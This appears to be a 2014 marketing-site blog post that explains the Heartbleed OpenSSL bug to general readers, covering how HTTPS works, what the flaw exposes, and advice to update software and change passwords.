- Content Marketing
When Your Customers Become Your Contributors: Brand Journalism Meets TraditionalGoogle Is Changing the Close Variant Matching Option in AdWordsBefore You Invest in Online Advertising, Do This!Native Advertising: The New New Thing or a Race to the Bottom? [VIDEO]
Technology & Data
Data and Creativity at the Social Shake Up: Defining Your Data-Driven Social CampaignTalking Strategy and Data with Shannon Lee of Precision StrategiesNew IBM Study Reveals 3 Key Characteristics of the Most Successful CompaniesMinority Report: Confronting Privacy Issues in Big Data Gathering
- Tech & Innovation
- marketing automation
- Social Tools
Social Change Agent Survey: Passion, Skill Set, and Persistence Lead to Career Growth#SocBizShakeUp: Sandy Carter at The Social Shake-UpThe Social Shake-Up: How CMOs Drive Innovation and Revenue GrowthOracle CEO Larry Ellison Takes New Role: What Does It Really Mean?
Study Shows SMBs in 5 UK Industries are Ready to Take on Social Media MarketingIs Your Small Business Doing Content Marketing Wrong?5 Free and Effective Social Media Tools Perfect for Small BusinessesWhat's on Our Bookshelves? Great Reads for Small Business Owners and Entrepreneurs
- Social Organization
Recap from the First-Ever Employee Advocacy SummitFormer IBM Senior Advisors Launch Brands Rising to Build Employee Advocacy ProgramsPerformance and Risk Management Through Social Media TrainingEmployee Advocacy Summit: Advocate Stories from the Field
- Customer Service
Join us September 15th in Atlanta for The Employee Advocacy Summit and learn how to unleash the power of your employees.
Post your event here and we'll share it with our community. If one of our members is featured, we'll promote as well on their profile.
- Marketplace & Webinars
The SMT Marketplace
Your resource for exclusive content and insights from Social Media Today, and opportunities to reach our community of professionals.
The Social Business Book Club brings you books, discussions, and insights from today's to business thought leaders.
Join interactive talks and and panel discussions with leading thinkers and practitioners on social media and networked business, or browse the catalogue of recorded sessions - all completely free.
Reach Social Media Today's community of marketing and communications professionals in an editor-approved context with a native advertising package.
Meet Heartbleed: The Huge New Security Flaw for Secure Websites
Posted on April 15th 2014
Internet researchers have found a brand new, very serious vulnerability called the Heartbleed Bug, which makes it possible for hackers to steal encrypted information from secure websites that run certain versions of OpenSSL.
This bug allows attackers to access the memory of the websites running vulnerable versions of OpenSSL software, including the secret keys used to encrypt messages sent by those websites. This gives attackers the ability to decrypt and steal supposedly secure data captured during an encrypted web session.
A Quick Review of Secure Websites (HTTPS)
Online retailers and banks use HTTPS -- short for Hypertext Transfer Protocol Secure -- to secure messages sent and received by their websites. Have you ever seen a small lock symbol next to the URL of a website? This indicates that the website’s traffic is secured using HTTPS.
The technology behind HTTPS is called SSL, or Secure Sockets Layer. SSL creates an encrypted link between the website and your browser which is supposed to ensure that the website is authentic and that all data passed between you and the website remains private.
Secure websites rely on SSL -- and TLS, Transport Layer Security (a newer version of SSL) for creating encrypted sessions. TLS/SSL uses cryptographic keys contained in digital certificates to allow your browser to confirm that web servers are who they say they are. TLS/SSL then generates secret keys used to make sure the data exchanged between you and a secure website is kept private. A hacker that captures SSL/TLS-encrypted messages sees only gibberish – unless he has the secret keys used to encrypt those messages.
OpenSSL and Heartbleed
OpenSSL is an open source software package that many website developers use to perform TLS/SSL encryption. Unfortunately, due a small coding error, certain versions of OpenSSL allow any attacker to send a “heartbeat” message which retrieves small chunks of a vulnerable web server’s memory. By sending heartbeats repeatedly, the attacker can collect quite a bit of information from the server, including secret keys used by TLS/SSL.
This is a big deal, because if attackers can harvest those secret keys, they can use them to decrypt messages sent and received by that server, now or at any time in the past. By decrypting your messages, attackers can steal your website login information as well as other sensitive information like any credit card information exchanged with an online retailer website like Amazon.
In addition, this OpenSSL security flaw – dubbed “Heartbleed” -- also allows attackers to see how the website is identifying itself through digital certificates. With this stolen certificate information, cyber thieves can create fake websites that look authentic to both you and your browser.
And the worst part about it is that you would have no idea that an attack had taken place because the stolen website certificate appears to be authentic.
What You Can Do to Mitigate the Risks
Luckily, not all versions of OpenSSL contain this security flaw. There are newer versions out there that have fixed this bug, and discovery of this very high-profile bug will likely trigger a rapid wave of website updates to eliminate it.
But this security flaw has been there for two years, and many websites still use vulnerable versions of OpenSSL, If you have an account with an impacted website, you should immediately update your login/password information. These sites will not only have to upgrade to a newer version of OpenSSL, but also change out all of the digital certificates previously issued to their web servers.
Unfortunately, there’s also no way to know if hackers used stolen secret keys to decrypt any of your account information or messages, since they would leave no trace. It’s best to assume the worst and change your logins and passwords today – not just on vulnerable websites, but on every website where you use the same or similar login/password.